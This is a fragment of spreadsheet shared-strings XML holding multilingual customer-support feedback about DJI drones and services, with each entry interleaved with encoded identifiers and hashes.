    <t>yNtNudpWUPP1Lt/QOq6FJk7dc+5gLpmzdyymxioXcG4=</t>
  </si>
  <si>
    <t>45b7cd395e5a8c0c4b6a87e97357296d</t>
  </si>
  <si>
    <t>|82643445466131112344032</t>
  </si>
  <si>
    <t>cYhTRY+ajjQlNC+7zA8smoy68zBwYR2chVd82+94h/Q=</t>
  </si>
  <si>
    <t>Timed out as I finished typing!!!!</t>
  </si>
  <si>
    <t>mnKGwtFO1SoBpYbTELtFhuG1TnJGXkCqhDqUKCMcdvg=</t>
  </si>
  <si>
    <t>22b5ce0f34af5778489d1757e1d8ec69</t>
  </si>
  <si>
    <t>|82642735886088148961233</t>
  </si>
  <si>
    <t>VVwJAIDH6A4yALAYdzgCVf25lNxHdoNdiqXajn6ARXM=</t>
  </si>
  <si>
    <t xml:space="preserve">Activation dji care refresh impossible </t>
  </si>
  <si>
    <t>W3/MSba3er5GBhtWr6HWnK8uderLPEhYM7zGiurW2sU=</t>
  </si>
  <si>
    <t>488b305604e2a2d90cb0eb7f31b9bfbf</t>
  </si>
  <si>
    <t>|82642657730595266868798</t>
  </si>
  <si>
    <t>LAsyBPi2TKM8SKyiRp6yaw==</t>
  </si>
  <si>
    <t>very satisfied</t>
  </si>
  <si>
    <t>yScvvs0jGP3TI22psC2VC71nD2fSRc6uLTHMS1vB9rs=</t>
  </si>
  <si>
    <t>5d07c2ab3fc298b49eec10a108e9bce2</t>
  </si>
  <si>
    <t>|82644279921071852789837</t>
  </si>
  <si>
    <t>Oz9X49U6pegDY0K+icYh8Q==</t>
  </si>
  <si>
    <t xml:space="preserve">Supprimer compte gmail et merci
</t>
  </si>
  <si>
    <t>yvDd7LxLCBZMTVI8r2+WGZWktsfFhLV40HXn48K/l5A=</t>
  </si>
  <si>
    <t>d722cda610ed44513f8891e431fca5fa</t>
  </si>
  <si>
    <t>|82642512054883989276455</t>
  </si>
  <si>
    <t>tjA4bQ4/lwJSgbclFOI/DA==</t>
  </si>
  <si>
    <t>I have to type in the 349830 digit s/n</t>
  </si>
  <si>
    <t>kyNi554051Hdl+SH4VUYmvUlbAxhMGA8BhFflLTn4YA=</t>
  </si>
  <si>
    <t>7553ccfcf80ae995919cfab166cade67</t>
  </si>
  <si>
    <t>|82641406010255962966792</t>
  </si>
  <si>
    <t>298AFOFVjzdC6f1pLDrhyzGfQHOblLHRYx2m2Qg3MZk=</t>
  </si>
  <si>
    <t xml:space="preserve">Je n'arrive pas à exprimer une simple demande par message...
</t>
  </si>
  <si>
    <t>tSQZ+pEV2htRjcg4Pgwzqn98iM/6WsfccNPLGmKDo1A=</t>
  </si>
  <si>
    <t>a7e05c150d1e4f1a6509ceca01afd79c</t>
  </si>
  <si>
    <t>|82640972303818532154243</t>
  </si>
  <si>
    <t>2YmipIQwayimA1x78FvDiSolaOg6nMuNzqf4C0eXKlc=</t>
  </si>
  <si>
    <t>A good help as had problems signing up but all good now thank you.</t>
  </si>
  <si>
    <t>cYrHLzGxDxH7JYBvjkwKc2rifKQuMIQO3m8t5hZ7s+A=</t>
  </si>
  <si>
    <t>8d66323b47179b4e0909c069c5b013e3</t>
  </si>
  <si>
    <t>|82640919927296888788203</t>
  </si>
  <si>
    <t>2xw8H74XRoUD9P+s1QmAvg==</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to speak to someone. </t>
  </si>
  <si>
    <t>TvOOupYdKU1U9o5+ACJ3BMBN9VakBja241gkp0b0B0A=</t>
  </si>
  <si>
    <t>67a641f60d3b27aec9fcd686d2b3d7b7</t>
  </si>
  <si>
    <t>|82640992152697227872720</t>
  </si>
  <si>
    <t>tLD2DwgdAd6ItSahn5mIfrkajZ8aHHA+XDnGotH5yso=</t>
  </si>
  <si>
    <t xml:space="preserve">Low grade support. Sell,sell sell . .   and only 20 words at the most ! Live chat ?  </t>
  </si>
  <si>
    <t>I2NGc0ReeC5J9QcOSwTeTuAXL86oywUQuSqRq6yF8z4=</t>
  </si>
  <si>
    <t>13e32a1857675e5b86ee454ec02a48f1</t>
  </si>
  <si>
    <t>|82640991121468975775575</t>
  </si>
  <si>
    <t>pnc8XMQyMmgip7zvN/6epUyS9vD7wwXhsXpw8slqdDw=</t>
  </si>
  <si>
    <t>Les contacts seraient plus efficaces en utilisant le courriel.
le dialogue est interrompu sans cesse</t>
  </si>
  <si>
    <t>a0kogapC9jYx/GECgNTwV97aEFnlgYGu7cdrTDK9fNw=</t>
  </si>
  <si>
    <t>49ef24e8996d1e3b6d314ceacf66168e</t>
  </si>
  <si>
    <t>|82641711894556024279279</t>
  </si>
  <si>
    <t>crHSnvS7WdLOaaXU6GH61ntwWiN3W3CCB7je23Rsvpo=</t>
  </si>
  <si>
    <t>Keiner meldet sich und die Hilfe die ich bekomme ist nicht wertvoll</t>
  </si>
  <si>
    <t>Sgz9MGIAiBVgdWP2GPjF1TE2kgVl8bnTMzGHM+U8JfA=</t>
  </si>
  <si>
    <t>658c9645b7d415c7f76c9ffa624f2f4a</t>
  </si>
  <si>
    <t>|82640511871782126368912</t>
  </si>
  <si>
    <t>2dIHsFhyi0pnAPFX/4iDCrpncKsj8Ztk9Q1w0zJHY+k=</t>
  </si>
  <si>
    <t>it sucks</t>
  </si>
  <si>
    <t>SZyOdz5Af9hIEeerpiVDKMxjIcOyJ+YwSqN8G2tt0yw=</t>
  </si>
  <si>
    <t>12d425c97c71b21929a07ea16902338b</t>
  </si>
  <si>
    <t>|82639935567308311451137</t>
  </si>
  <si>
    <t>Z+sfkpfpkhFWiISNBV7zDA==</t>
  </si>
  <si>
    <t>No response</t>
  </si>
  <si>
    <t>vZFyYaGGY2hR5M5AOqNAlQK72si8V9zsaBM7tXxx3Jw=</t>
  </si>
  <si>
    <t>5608b70fe29274ac98ba7e3e00583fb6</t>
  </si>
  <si>
    <t>|82640459024551230326792</t>
  </si>
  <si>
    <t>yWIa/lBQRKY+EIQvLfmsjw==</t>
  </si>
  <si>
    <t>Quick and courteous support is meaningless when you insult your customer.</t>
  </si>
  <si>
    <t>LKAoGeY3twG0lFlD64LId9N9lCs7C9QLJmsTS664JmU=</t>
  </si>
  <si>
    <t>f9a69f1d5433a6a4e5681eb102bb0785</t>
  </si>
  <si>
    <t>|82639490556082527719809</t>
  </si>
  <si>
    <t>pELV6PqZAqn4q0HakcOK6kHhisrlpPTz6U60BIJc6y4=</t>
  </si>
  <si>
    <t xml:space="preserve">sorry the 1000 expansion unit how hard is it to get repaired </t>
  </si>
  <si>
    <t>wjWuPzBo6gSQAsQRVvNR6OuvZYaZFJXHSlvDFZQQBlk=</t>
  </si>
  <si>
    <t>9a8c500b295410e193fc4da2c19cfed4</t>
  </si>
  <si>
    <t>|82638214236371850784871</t>
  </si>
  <si>
    <t>pkbW+CauM8Eb2d+Qn/SQXFbNa+FId4GjSCqJyf/eBQM=</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, my name is Karla Valencia, I`m talking about Saquinsa Export Import company in Mexico
</t>
  </si>
  <si>
    <t>+IxNCD5PP6asOsKr/oACRpqUI18hZzuwEig6lkOJoPU=</t>
  </si>
  <si>
    <t>5737f5d08fa7dc2cc2c9660e6f619195</t>
  </si>
  <si>
    <t>|82638612591102777561852</t>
  </si>
  <si>
    <t>Y5fusGXR9qvsI3TnSpMC3H0Uif9l4rDJPfJ2z5f93Eo=</t>
  </si>
  <si>
    <t>I made the order online and yet she said that it's in retail!? How???</t>
  </si>
  <si>
    <t>4QK4rml2wKvz2Ymw4L+Roxsx8QZL7S+zB8Fzsnh3+I4=</t>
  </si>
  <si>
    <t>936402e9d526c106f1c336186333cbec</t>
  </si>
  <si>
    <t>|82638289677634171435438</t>
  </si>
  <si>
    <t>AWB/8T/Q4JTjC4+Wh2m9F6h2ThLbZUBC0jYYzowshb4=</t>
  </si>
  <si>
    <t>Klasse Service, hat funktioniert, danke...</t>
  </si>
  <si>
    <t>s+a/VcOJJ//gufyMz+HCN0MkcCaecdKZOI/uq+iDUmo=</t>
  </si>
  <si>
    <t>9c711b101d80a472e0bf6b868a2947a6</t>
  </si>
  <si>
    <t>|82638765760814919326261</t>
  </si>
  <si>
    <t>EQQyscNo5CULtaYh45aYfvI2kzMJfLb8nh1rK65QbsHh3MAGBpGQQG3ezRzieOez</t>
  </si>
  <si>
    <t>Hi, I need to talk to na agent please!.</t>
  </si>
  <si>
    <t>gJPfgmo00Wye72vfhFGThLWh7Gf1M8RE8xvs2ZSk7tU=</t>
  </si>
  <si>
    <t>42e50b829f371f5fc9506880a0d2a6f1</t>
  </si>
  <si>
    <t>|82638133535248694630642</t>
  </si>
  <si>
    <t>jdMLqmSM5DLzfijQWE2j7FrxRtWctlGh5pQGZzWOV9s=</t>
  </si>
  <si>
    <t xml:space="preserve">El idioma </t>
  </si>
  <si>
    <t>c4h8HLTqWfOOqBNO1sWVwXzGH8JU+254cc5GMIjRIho=</t>
  </si>
  <si>
    <t>0f8b9a8c3f4be2eb8fc882a68d262a05</t>
  </si>
  <si>
    <t>|82637175476942326870884</t>
  </si>
  <si>
    <t>G90ksn0TYy4p0RvNey8gPz63+7/vReVDkoNDlyGB3Qg=</t>
  </si>
  <si>
    <t>Hi, the pictures I take on my Air 3 is very pixelated and bad quality how do I fix this?</t>
  </si>
  <si>
    <t>c/lSuXzrhocDyCa0cfgzosRwOoA6TVw56WxkPjyWjaw=</t>
  </si>
  <si>
    <t>7f7a24f544c029ccc2427d83cbd380be</t>
  </si>
  <si>
    <t>|82636692967238300059513</t>
  </si>
  <si>
    <t>h55Q5Te5Ge/PZXkUivqjEw==</t>
  </si>
  <si>
    <t xml:space="preserve">I HAVE THIS LIC d82f9de6-022e-4536-ab15-3b96c2ea7f40
AND I WANT TO bind it to other device 
</t>
  </si>
  <si>
    <t>/Fq9UEsPujdvRdJ6ZUM23afl67wcpmJzUW45Hd0mYSo=</t>
  </si>
  <si>
    <t>a98437a79e821bbc26081f8233366de3</t>
  </si>
  <si>
    <t>|82637306849399995574325</t>
  </si>
  <si>
    <t>QZW1WmxHryAl6DEKMWDvBmSXFvCSr7LFCAwG2//v0rk=</t>
  </si>
  <si>
    <t>Personne ne répond au mail</t>
  </si>
  <si>
    <t>sGoIBZbi0jMjeEVM5W4BN+qWzAAlOe5Uq+fr/M2bvSY=</t>
  </si>
  <si>
    <t>933d2ecff46e976dc6ff8a1b47f07d12</t>
  </si>
  <si>
    <t>|82636390510601510314548</t>
  </si>
  <si>
    <t>leT3XUZ6pppKKucMwI6Rhg==</t>
  </si>
  <si>
    <t>Activacation software is nearly impossible to find and execute ,very confusing . Been trying for 2 h</t>
  </si>
  <si>
    <t>4OP2kDwzKfvTA1f7p0czqjsD5DyJuthFbgamJEdYhEI=</t>
  </si>
  <si>
    <t>e791e58c611f70b31b27d2483dd4f6bd</t>
  </si>
  <si>
    <t>na_sp17</t>
  </si>
  <si>
    <t>|82637292415115289814250</t>
  </si>
  <si>
    <t>JAcmP2C7kP2x9af2s1TOwcZGrI7Sxmf8WkwbgWr5LwI=</t>
  </si>
  <si>
    <t>I've been waiting FOREVER. Get more agents please</t>
  </si>
  <si>
    <t>2fV+spsaEDdIHEzJfjoLiooOXZp5HrBokVk7NiAIbJE=</t>
  </si>
  <si>
    <t>68324737f194789db7305e19576b4b89</t>
  </si>
  <si>
    <t>|82635765097897081721645</t>
  </si>
  <si>
    <t>4GntvSBtQ+upgvQ7uQ/2gWlDikrLXXq7275jCapKgFE=</t>
  </si>
  <si>
    <t xml:space="preserve">`gibt es noch ersatzaccus für dji mini
</t>
  </si>
  <si>
    <t>Y1HQBP1pm62Cw25EX3qVaX7AMP/R87sIFKwacZFvbP4=</t>
  </si>
  <si>
    <t>3872455d2873987b7d5878c1ba791619</t>
  </si>
  <si>
    <t>de_other01</t>
  </si>
  <si>
    <t>|82636310841936785181893</t>
  </si>
  <si>
    <t>tkqa4EKuuhtkqXgIbFona98A5aGGA6xbBpmpjQdU5JA=</t>
  </si>
  <si>
    <t>Lange Wartezeiten.</t>
  </si>
  <si>
    <t>4R+cEMwQJcFVAQ0DrG7LM6HvozHFNxJQKJUfFlQPHeU=</t>
  </si>
  <si>
    <t>017364c3851d2dd5a8c79d9f8583594e</t>
  </si>
  <si>
    <t>|82635435065595367657209</t>
  </si>
  <si>
    <t>SwaK/bLpZszbAaDgyXu0STq3JjvXMlpHJhrhoa04G40=</t>
  </si>
  <si>
    <t>h1DvmOOT2D4yvNvmzDa+RRRLzVd01kGHmv3CTfa9LJI=</t>
  </si>
  <si>
    <t>1b4142c62a72bcdee143b8f3b83eafe3</t>
  </si>
  <si>
    <t>|82634870487714935773265</t>
  </si>
  <si>
    <t>dg5mBHr/pM71AjkCjTp1KQ==</t>
  </si>
  <si>
    <t>No case #. how am i supposed to reference this</t>
  </si>
  <si>
    <t>DjbqFCdwMurnsmVuktWRW4q6ut0jpFram3csCtupUbk=</t>
  </si>
  <si>
    <t>2e289d778928125823c35e840c1dcd59</t>
  </si>
  <si>
    <t>|82634896486314313096049</t>
  </si>
  <si>
    <t>3nh8Jv+uTUHvyBHOPsfvGuzbqonYf9aokPo6GbBqg80=</t>
  </si>
  <si>
    <t>Für die Bestellnummer:0499884120689 benötige ich eine Rechnung</t>
  </si>
  <si>
    <t>mfI9jVADChsCSxG8qgGMy1HfezcwXDeeBCGMDwkJTKg=</t>
  </si>
  <si>
    <t>68fc1e446637eb5bf1700e68a4a75a79</t>
  </si>
  <si>
    <t>|82635300204093525634826</t>
  </si>
  <si>
    <t>ieicsvr/ZHcia6XYuD8GsQ/WRH/l/UWPIFK6z9HQzr8=</t>
  </si>
  <si>
    <t>I was busy typing my problem and now I can start over again ..</t>
  </si>
  <si>
    <t>RUjyh1VSN7ofRk06QZtMaEEur/2fxpZqBzohKZvUxW8=</t>
  </si>
  <si>
    <t>116c8d83f50df052eacc9e2a236bb72b</t>
  </si>
  <si>
    <t>|82635157580259509478752</t>
  </si>
  <si>
    <t>ZTd2vMeJRtf70lq1+M1Vyqf+nxF3TfUXY1STtuVXBEo=</t>
  </si>
  <si>
    <t xml:space="preserve">lookin for upper quick release plate for DJI Ronin SC </t>
  </si>
  <si>
    <t>9mqeX/ELUpc9/ijkdHlE82/dvg2/9o6T5u9+YH8OzL4=</t>
  </si>
  <si>
    <t>f6bf080f7f53d82da6d1bbba4ebae009</t>
  </si>
  <si>
    <t>|82634581212883683589912</t>
  </si>
  <si>
    <t>VEhEq07aGl8s8Z9Xgxh04Q==</t>
  </si>
  <si>
    <t>It's gives greatinfo.</t>
  </si>
  <si>
    <t>YkcurtbV13/eUmGw8eh43jseTl4n8iCiRq1RZMfyjuQ=</t>
  </si>
  <si>
    <t>6f8c868f003b872ea6614c08ff42c48c</t>
  </si>
  <si>
    <t>|82635640471862440826019</t>
  </si>
  <si>
    <t xml:space="preserve">Hallo,
für die Bestellnummer: 0499884120689
benötige ich eine Ordnungsgemäße Rechnung.
</t>
  </si>
  <si>
    <t>4a6056c6dac0ab9a84f75beb6cbbe1e8</t>
  </si>
  <si>
    <t>|82634202026207459881899</t>
  </si>
  <si>
    <t>naNGiggWe+mfoSilL/+trJwb/yzbzQdtymbmEsqbHfs=</t>
  </si>
  <si>
    <t>The chat closed before I completed my question.</t>
  </si>
  <si>
    <t>OtroLXv4pOfPP4iwC9LuM/SXW6HbXxv6Ctmjoaaot6Q=</t>
  </si>
  <si>
    <t>3daa01c09d1a6247db5d1ad9409ea6f9</t>
  </si>
  <si>
    <t>|82633916944673759999827</t>
  </si>
  <si>
    <t>995klr1C3+n1W8rcGC/d5GlWLd3IDqZ+6DY5pribgHI=</t>
  </si>
  <si>
    <t>I had an open case an was told over 2 weeks ago, that I would be contacted. Nothing has happend sinc</t>
  </si>
  <si>
    <t>iWUrpSmv4UUX9I5Ytbl+Xv/jyQTW8n66kpaJxg+/GmY=</t>
  </si>
  <si>
    <t>c3b5a387ecedbfa6c40ca25f713ac376</t>
  </si>
  <si>
    <t>|82633377773459749124495</t>
  </si>
  <si>
    <t>P1q73ThS7b72C7YSEcrDqdEuIygAal6fenObTTCdDPw=</t>
  </si>
  <si>
    <t>not useful for my issue</t>
  </si>
  <si>
    <t>Oq3rWOTjBMCRLDLjKEPnBuIXFV29D67gnTpeXyss434=</t>
  </si>
  <si>
    <t>fff10c0ad537b8223113c409712c25dd</t>
  </si>
  <si>
    <t>|82634507055755030026526</t>
  </si>
  <si>
    <t>aSjYVUb/bPbBzA7nQOB2MQ==</t>
  </si>
  <si>
    <t>sometime we just need to talk to a person</t>
  </si>
  <si>
    <t>8FjAu3KdVSYa9anAExcU4FSG3sGpUiQu5H4DylxsZQ4=</t>
  </si>
  <si>
    <t>58d00b45e6a20773cf44de8f47778922</t>
  </si>
  <si>
    <t>|82632819064912766364970</t>
  </si>
  <si>
    <t>pJozlaVDA/Wtu+AhcgwdDmFk9T/lq5wEiztAjczNk7Y=</t>
  </si>
  <si>
    <t>Hi
 Is the verification of video sn 1581F87LB247R0020349 successful or can I pay dji care 2 years?</t>
  </si>
  <si>
    <t>hkQR8IIg1g8hyfW3rN1H8cSMCxCG94hFgjCHmoiBrrs=</t>
  </si>
  <si>
    <t>5e60b68002d0155f88a8eebec9e2380f</t>
  </si>
  <si>
    <t>|82632047074815037972115</t>
  </si>
  <si>
    <t>74sH75nfvm1VwZehwZOGfkr9gu442ME8Pq3Zx6518r4=</t>
  </si>
  <si>
    <t>Trying to submit a repair request after accepting the repair terms, but greyed out.</t>
  </si>
  <si>
    <t>SnrMlSFmKjmbRqNY24LvT0egSyIP4MrOy184D4gg4ZQ=</t>
  </si>
  <si>
    <t>c358586216ccbcc275d086ef91fa34e6</t>
  </si>
  <si>
    <t>|82632183926431371859789</t>
  </si>
  <si>
    <t>I'm trying to submit a repair request, but every time I hit "Submit", it says to accept repair autho</t>
  </si>
  <si>
    <t>f99460ac473e6800d6357811c73d478a</t>
  </si>
  <si>
    <t>|82631329293626168673663</t>
  </si>
  <si>
    <t>JvTinxHnNSJtvRIrc79l+KjGsPJEeAtG5y48cesbYEA=</t>
  </si>
  <si>
    <t>Dji refresh doesn't allow me to subscribe 2 years plan</t>
  </si>
  <si>
    <t>9G6lEFVrMGfAZd1iAkyW2FuZ2vwwMXidEiosKncXSdI=</t>
  </si>
  <si>
    <t>81b19ea8e867999c9cc4b32e35d81b69</t>
  </si>
  <si>
    <t>|82630340631321414323141</t>
  </si>
  <si>
    <t>iEt5pGhLr4hhcq4amnYFmBUw6bwzHVaVJqhWqXZvH/c=</t>
  </si>
  <si>
    <t xml:space="preserve">Very helpful and patient </t>
  </si>
  <si>
    <t>aVvWvnuTaRb5As1VCZ+MLgEuySRcaBD3EdSRtSSRQFw=</t>
  </si>
  <si>
    <t>5a7022d2c175692815558b8fc6c410ee</t>
  </si>
  <si>
    <t>|82630560084478138492802</t>
  </si>
  <si>
    <t>z6w8DF8MKprjjM3FtcfOfvqfEyn60gKiCQevCkuHytA=</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>친절한</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>설명</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>도움되었습니다</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>감사합니다</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t>^^</t>
    </r>
  </si>
  <si>
    <t>P0QP1PxVxT+LxnVPltXqXqRMJQ1+RRGP9WC2cxR1Npw=</t>
  </si>
  <si>
    <t>4ee967e0ab2fe9e78f8fed8c9b79eca2</t>
  </si>
  <si>
    <t>|82630288543344253628062</t>
  </si>
  <si>
    <t>84cd4+CLz2CkuB/pttRs3w==</t>
  </si>
  <si>
    <t xml:space="preserve">Did I get lied to?
</t>
  </si>
  <si>
    <t>3cqv8ES6J/Fj7gjaMFirLwEwfRhSasz/eC0CaNUWNXI=</t>
  </si>
  <si>
    <t>c18d411d4e77bb7e411b4a5aedc3f8f6</t>
  </si>
  <si>
    <t>|82629463895402937841369</t>
  </si>
  <si>
    <t>rE9yLxVOrv3qXuo8r9upuQ==</t>
  </si>
  <si>
    <t>Ich habe noch kein Service benötig. Deshalb kann ich ihn auch nicht bewerten.</t>
  </si>
  <si>
    <t>737dfzKNEMyTJZcc30xcbqb8KVuITvsch1ZDgPSbDVU=</t>
  </si>
  <si>
    <t>d7eb4f4e79bcd6401e569f765715ac1d</t>
  </si>
  <si>
    <t>|82630262820323637948204</t>
  </si>
  <si>
    <t>6TIwTQwsTEFlw3eXrhCbVg==</t>
  </si>
  <si>
    <t>Buongiorno, c'è qualche aggiornamento sulla mia segnalazione Drone del 13/02 Grazie Gentilissimi</t>
  </si>
  <si>
    <t>24kNyPJFC2lEevEy19gkh7IfOFwropyh4MiiI6Z6Zg8=</t>
  </si>
  <si>
    <t>2152a619acee545992c406b786512414</t>
  </si>
  <si>
    <t>|82630097487748888442602</t>
  </si>
  <si>
    <t>YvgIBiC35Mf5V0+mnHe8IQ==</t>
  </si>
  <si>
    <t>No way to contact a human.  Lost my Mini 3 in the Palisades Fire.  Bought new Mini 4.  Curious.</t>
  </si>
  <si>
    <t>IDgE/ywPvsaMtYnGDOzgHwWZW3TB0PsFEcAVI08+kh4=</t>
  </si>
  <si>
    <t>c2ca4a4c788db156a8d12d916d7bfc09</t>
  </si>
  <si>
    <t>|82630121426405969996641</t>
  </si>
  <si>
    <t>W+PeloKbyG6/TSLM4trmMUoCSMrxn8wOWzSWpnGXgDM=</t>
  </si>
  <si>
    <t xml:space="preserve">Cancelled my order never received item and still waiting for refund bad service </t>
  </si>
  <si>
    <t>6dw2rB6xMG6HXB9IvCZXQDlZo8KFeIuHcP0g6e2mv/c=</t>
  </si>
  <si>
    <t>9ee1ff0a3a737b04ae5c69c15173053a</t>
  </si>
  <si>
    <t>|82629227830714410288156</t>
  </si>
  <si>
    <t>ieHpKy9Kc2ajM+F20ZYjMwZ0hbdzt3cgLWLQWSsYBvY=</t>
  </si>
  <si>
    <t>Soy de Argentina es compatible mi teléfono Noblex aplicación DJi fly</t>
  </si>
  <si>
    <t>DkI+CvnKfujcEjUDVFiw0FDyH7tOEaI7BogwDnfoIOk=</t>
  </si>
  <si>
    <t>95f82bbd802baaecededa18a2f9049e0</t>
  </si>
  <si>
    <t>|82628781281856231057680</t>
  </si>
  <si>
    <t>VhfWTDqg6to9kaORbmkxiw==</t>
  </si>
  <si>
    <t>whitch polarization is in googles ! ?</t>
  </si>
  <si>
    <t>Dh5E/d8qLqJfYD3GPq+Q7nOAZFBAiGbjocAbzUfCLio=</t>
  </si>
  <si>
    <t>18da93b2901ed8d7c0d7b35818a957b4</t>
  </si>
  <si>
    <t>|82630062280928203753077</t>
  </si>
  <si>
    <t>neXzQF9eLWhh2r4EI5vGdg==</t>
  </si>
  <si>
    <t>Customer service of the highest quality.</t>
  </si>
  <si>
    <t>nVDNPAWpUHvBf3r8YgM83dTZK6H3l8JBBZnM2/yucuQ=</t>
  </si>
  <si>
    <t>00f2ddfb638dd45c9d9eba7515cbce46</t>
  </si>
  <si>
    <t>|82628721359673042498516</t>
  </si>
  <si>
    <t>cTdR+hAbG2zBBrGqgCb2ig==</t>
  </si>
  <si>
    <t xml:space="preserve">er bietet keine wirkliche Hilfe, besser mit einem richtigen Menschen reden! </t>
  </si>
  <si>
    <t>ib3cbU9TeS8LDrykoTqwOQ==</t>
  </si>
  <si>
    <t>32495e1937e34cac5034b32d0681b4c1</t>
  </si>
  <si>
    <t>|82626562122751262018394</t>
  </si>
  <si>
    <t>VUX3t5XJD8QHusCA5Ci8gYqIyFnIxoT9iiIQ3yqNh5s=</t>
  </si>
  <si>
    <t xml:space="preserve">No one has responded yet
</t>
  </si>
  <si>
    <t>nybzwqhKvOfcKQMVDCCk2oQAnLGcxF9u4FX9d/EWnsg=</t>
  </si>
  <si>
    <t>deee0d477bc9d986b99f85bd68fc1a8d</t>
  </si>
  <si>
    <t>|82626359493603297887664</t>
  </si>
  <si>
    <t>uL8JXm+RlxAoojs9HB6LiA==</t>
  </si>
  <si>
    <t>I didn't get any answers to my question.</t>
  </si>
  <si>
    <t>uS/CNXutv0EPT8gIDOo11ss04TUkILNkHTwKhcfcYYk=</t>
  </si>
  <si>
    <t>c4131f7a6122502013a5310a2e11f885</t>
  </si>
  <si>
    <t>|82625983189438312970788</t>
  </si>
  <si>
    <t>2tMjgb8a+ALoBDP5fwXlvK83a4jGQTilfdihLbrFClU=</t>
  </si>
  <si>
    <t xml:space="preserve">This does not answer my question </t>
  </si>
  <si>
    <t>QOz3hhexeapSHZfhqJqeqfHtTfG662qkEIpZ94S9U50=</t>
  </si>
  <si>
    <t>6988969b86de5fdb4a75f6a0c41069a6</t>
  </si>
  <si>
    <t>|82625955828293171540020</t>
  </si>
  <si>
    <t>w17ngU4nAmKi0mQPRq/uJeefa7tjlLdSsCwK6rKm+B4=</t>
  </si>
  <si>
    <t>need a phone number!</t>
  </si>
  <si>
    <t>8bluUijrBTTVN4ClnpcX8VRVyyRYZ+ZJA596FsDM1s0=</t>
  </si>
  <si>
    <t>7057c1e0c2fe0d52c919cc7fbe424f8b</t>
  </si>
  <si>
    <t>|82625565496069825074592</t>
  </si>
  <si>
    <t>RCu2LrHmdYZ1aK0QWX4N1Q==</t>
  </si>
  <si>
    <t xml:space="preserve">I cannot login in app
</t>
  </si>
  <si>
    <t>stU5TMyKqJJuOw1P9zao6SXDfKlWfRM3en7enlS9PvI=</t>
  </si>
  <si>
    <t>be3002fa6e11dd9126fe8900fa1e050b</t>
  </si>
  <si>
    <t>|82625292640832553534128</t>
  </si>
  <si>
    <t xml:space="preserve">I cannot log in the app </t>
  </si>
  <si>
    <t>286889dde7f6f3b2786d235b0837fd42</t>
  </si>
  <si>
    <t>|82624930807781943023222</t>
  </si>
  <si>
    <t>NOA36PZ0VGuNGHmk7/MebULDqLUdOEoztKRyaQB3Edg=</t>
  </si>
  <si>
    <t>Good attention. Willing to help in solving the case.</t>
  </si>
  <si>
    <t>Y46MIIL3vKxUY+MByQvdfyloNf1EDxeS+sUL0/aQH4g=</t>
  </si>
  <si>
    <t>84a6cf4ffe43cc6be193f100a728bc77</t>
  </si>
  <si>
    <t>|82624679475704428551604</t>
  </si>
  <si>
    <t>7P1hzacPSftdwXGp5j0ln04xy3CX8rBqtQwmQvfh0N0=</t>
  </si>
  <si>
    <t>I tend to have issues that need a person who can deal with nuanced issues that AI can't handle well</t>
  </si>
  <si>
    <t>UXuBLDt2LtpE8/uG1hXSWw==</t>
  </si>
  <si>
    <t>610f0cef7da2a9a66bd3a83049959536</t>
  </si>
  <si>
    <t>|82623712497002832394581</t>
  </si>
  <si>
    <t>wxQ6Oa3BTkk/38nPvSC1QK7+1eOPijEs1Ir1RLAUAsE=</t>
  </si>
  <si>
    <t>I wrote message and you delete it idiots</t>
  </si>
  <si>
    <t>zuDRhSOrQMa97zcV0W8J5LxofJwg9j55lSAYczmS0is=</t>
  </si>
  <si>
    <t>f0aa16d50302fde1b2204362d6292473</t>
  </si>
  <si>
    <t>de_mimo1</t>
  </si>
  <si>
    <t>|82623753043773811214473</t>
  </si>
  <si>
    <t>3si8zqfGK66/OfifVv/Z/XOuOAXRunFx+XgP5lEriQ4=</t>
  </si>
  <si>
    <t>Sorry es ist tatsächlich ein IPHONE Problem-mit Protake funktioniert es</t>
  </si>
  <si>
    <t>U/hSf/uyseNVd80jE6Bkx6qZCv6t6Yve4NFgLi7e5WY=</t>
  </si>
  <si>
    <t>8ce3b7c6d04a32d519daee310285f9a1</t>
  </si>
  <si>
    <t>|82623515829176549115779</t>
  </si>
  <si>
    <t>LLcrLwP+0M6b1juUJ18aAg==</t>
  </si>
  <si>
    <t xml:space="preserve">I need to stop a shipment sent to OkC Ok .That is connected to my old phone line. </t>
  </si>
  <si>
    <t>oFpR2Bj2AEtnxfraZAL9yoPuoM5XzzSDbv0CxifJCws=</t>
  </si>
  <si>
    <t>59a756b290e33f65a9f8fdc5631990d1</t>
  </si>
  <si>
    <t>|82623459657053444861601</t>
  </si>
  <si>
    <t xml:space="preserve">Sorry about not responding had a phone call still  excellent customer service </t>
  </si>
  <si>
    <t>1ac267d724392989ac95a2feedb79f25</t>
  </si>
  <si>
    <t>|82622459227253586043314</t>
  </si>
  <si>
    <t>q654dUgvvBTKrJdAaPO57w==</t>
  </si>
  <si>
    <t xml:space="preserve">Cannot talk to someone directly outside of the limited categories you allow.  </t>
  </si>
  <si>
    <t>6q4dsw5JZbT1fNBZ/tnPb/YF+7WOkLWiM3VS4rrjpDQ=</t>
  </si>
  <si>
    <t>2c7f2ca3b2c928686b247379f3bc871d</t>
  </si>
  <si>
    <t>|82622429558518002592253</t>
